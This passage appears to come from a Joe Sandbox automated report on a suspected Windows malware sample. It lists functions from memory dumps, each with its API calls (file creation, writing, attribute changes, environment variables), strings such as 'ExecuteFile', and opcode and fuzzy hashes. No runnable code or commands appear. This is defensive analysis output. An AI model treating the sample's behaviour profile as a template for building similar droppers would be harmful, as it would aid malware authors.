41273d-41275e call 4115ca call 411603 call 410684 1448->1454 1449->1425 1454->1400 1466 412764-412766 1454->1466 1466->1400 1466->1436
                                                    APIs
                                                      • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$ExceptionThrow
                                                    • String ID: (nA
                                                    • API String ID: 2803161813-867891557
                                                    • Opcode ID: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
                                                    • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                    • Opcode Fuzzy Hash: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
                                                    • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                    APIs
                                                    • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                    • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AllocExceptionStringThrow
                                                    • String ID: PlA
                                                    • API String ID: 3773818493-1533977103
                                                    • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                    • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                    • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                    • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                    APIs
                                                      • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                      • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                      • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                    • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                    • String ID:
                                                    • API String ID: 1642057587-0
                                                    • Opcode ID: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
                                                    • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                    • Opcode Fuzzy Hash: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
                                                    • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002F,0000002F,?,00406616,?,00419810,00419810), ref: 00401739
                                                    • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                    • String ID: ExecuteFile
                                                    • API String ID: 1306139538-323923146
                                                    • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                    • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                    • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                    • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                    • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@memmove
                                                    • String ID:
                                                    • API String ID: 3828600508-0
                                                    • Opcode ID: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
                                                    • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                    • Opcode Fuzzy Hash: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
                                                    • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                    APIs
                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemoryStatus
                                                    • String ID: @
                                                    • API String ID: 1890195054-2766056989
                                                    • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                    • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                    • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                    • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID: lA
                                                    • API String ID: 613200358-262130271
                                                    • Opcode ID: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
                                                    • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                    • Opcode Fuzzy Hash: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
                                                    • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@H_prolog
                                                    • String ID:
                                                    • API String ID: 1329742358-0
                                                    • Opcode ID: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
                                                    • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                    • Opcode Fuzzy Hash: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
                                                    • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@
                                                    • String ID:
                                                    • API String ID: 1936579350-0
                                                    • Opcode ID: f98f7cb9ec974a4530d0d7b56a79467f1bba101914a29fc132c294c06771da84
                                                    • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                    • Opcode Fuzzy Hash: f98f7cb9ec974a4530d0d7b56a79467f1bba101914a29fc132c294c06771da84
                                                    • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@
                                                    • String ID:
                                                    • API String ID: 1936579350-0
                                                    • Opcode ID: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
                                                    • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                    • Opcode Fuzzy Hash: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
                                                    • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                    APIs
                                                    • SetEnvironmentVariableW.KERNELBASE(?,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404630
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406260,?,00000000,0000000A), ref: 00404639
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 3880889418-0
                                                    • Opcode ID: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
                                                    • Instruction ID: b821aa63e9602637d8feb686bb827f934507ba03fca214f0c99b91fc16a187d9
                                                    • Opcode Fuzzy Hash: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
                                                    • Instruction Fuzzy Hash: BDF05836900118AFCB01AF98EC458CE77B8EB48704B41807AE922A72A1DB34AD418B8D
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                    • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                    • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                    • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID:
                                                    • API String ID: 3168844106-0
                                                    • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                    • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                    • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                    • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                    • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                    • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                    • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                    • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                    • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                    • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                    APIs
                                                      • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle
                                                    • String ID:
                                                    • API String ID: 3498533004-0
                                                    • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                    • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                    • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                    • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                    APIs
                                                    • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                    • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                    • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                    • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: _beginthreadex
                                                    • String ID:
                                                    • API String ID: 3014514943-0
                                                    • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                    • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                    • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                    • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                    • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                    • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                    • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
